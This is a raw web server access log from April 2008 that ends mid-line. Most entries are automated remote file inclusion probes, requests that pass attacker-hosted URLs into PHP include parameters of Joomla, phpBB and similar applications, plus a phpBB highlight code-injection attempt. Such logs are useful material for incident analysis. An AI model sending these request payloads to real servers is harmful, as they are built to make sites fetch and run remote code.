75.125.151.18 - - [10/Apr/2008:14:11:29 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:29 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:36 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:36 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:37 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:11:57 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:11:58 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:11:58 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:00 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:00 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:01 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:01 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:01 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:02 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.138 - - [10/Apr/2008:14:12:02 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:12:03 -0700] "GET /logs/access_080207.log//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:12:12 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:12:13 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:12:19 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:31 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:32 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:12:35 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:14:12:58 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:14:12:59 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:14:12:59 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.82.199.252 - - [10/Apr/2008:14:13:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.82.199.252 - - [10/Apr/2008:14:13:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:14:14:14 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.58.56 - - [10/Apr/2008:14:14:16 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.58.56 - - [10/Apr/2008:14:14:17 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.58.56 - - [10/Apr/2008:14:14:24 -0700] "GET /logs/access_080131.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.230 - - [10/Apr/2008:14:16:39 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:17:53 -0700] "GET /logs/access_080401.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.67.38 - - [10/Apr/2008:14:17:53 -0700] "GET /logs/access_080401.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:17:54 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.67.38 - - [10/Apr/2008:14:17:56 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:18:00 -0700] "GET /logs/access_080401.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:18:02 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:18:15 -0700] "GET /logs/access_080401.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:18:16 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:18:16 -0700] "GET /logs/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:14:18:16 -0700] "GET /logs/access_080401.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:14:18:20 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.67.38 - - [10/Apr/2008:14:18:51 -0700] "GET /logs/access_080308.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:18:53 -0700] "GET /logs/access_080308.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:19:04 -0700] "GET /logs/access_080308.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:19:25 -0700] "GET /!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.6.49 - - [10/Apr/2008:14:19:43 -0700] "GET /logs/access_080308.log/!scanhttp://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:44 -0700] "GET /funny/ HTTP/1.1" 200 808 "http://search.yahoo.com/search?ei=utf-8&fr=slv1-mdp&p=index%20of%20funny" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:45 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:51 -0700] "GET / HTTP/1.1" 200 7371 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:51 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:51 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:52 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:52 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:52 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.119.127.153 - - [10/Apr/2008:14:19:53 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
72.29.87.105 - - [10/Apr/2008:14:20:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.252.17.105 - - [10/Apr/2008:14:21:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.252.17.105 - - [10/Apr/2008:14:21:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:14:24:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:14:24:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.elite-warriors.eu/main//vwar/test.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:26:33 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:26:33 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:30:39 -0700] "GET //config.php?inc_dir=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:30:39 -0700] "GET /logs//config.php?inc_dir=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.193.201.67 - - [10/Apr/2008:14:32:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.18.76 - - [10/Apr/2008:14:32:50 -0700] "GET /logs/access_080321.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [10/Apr/2008:14:32:56 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:14:32:59 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.82.199.252 - - [10/Apr/2008:14:35:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.82.199.252 - - [10/Apr/2008:14:35:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:37:52 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:37:52 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:37:52 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:01 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:02 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:02 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:02 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:09 -0700] "GET /logs/access_080321.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:21 -0700] "GET /logs/access_080321.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:38:21 -0700] "GET /logs/access_080321.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:14:38:37 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:14:38:44 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.iskanunu.com/administrator/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.76 - - [10/Apr/2008:14:39:15 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:41:48 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:41:48 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.254.214.3 - - [10/Apr/2008:14:42:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/ghanjar.satriani/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:43:20 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:43:20 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.8.70 - - [10/Apr/2008:14:44:10 -0700] "GET /logs/access_080329.log//modules/agendax/addevent.inc.php?agendax_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [10/Apr/2008:14:44:11 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [10/Apr/2008:14:44:12 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.102.106.10 - - [10/Apr/2008:14:46:08 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [10/Apr/2008:14:46:08 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [10/Apr/2008:14:46:09 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:04 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:04 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:15 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:15 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:48:15 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
147.102.106.10 - - [10/Apr/2008:14:50:12 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:50:29 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:50:42 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:51:23 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:51:23 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:51:35 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.6 - - [10/Apr/2008:14:51:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www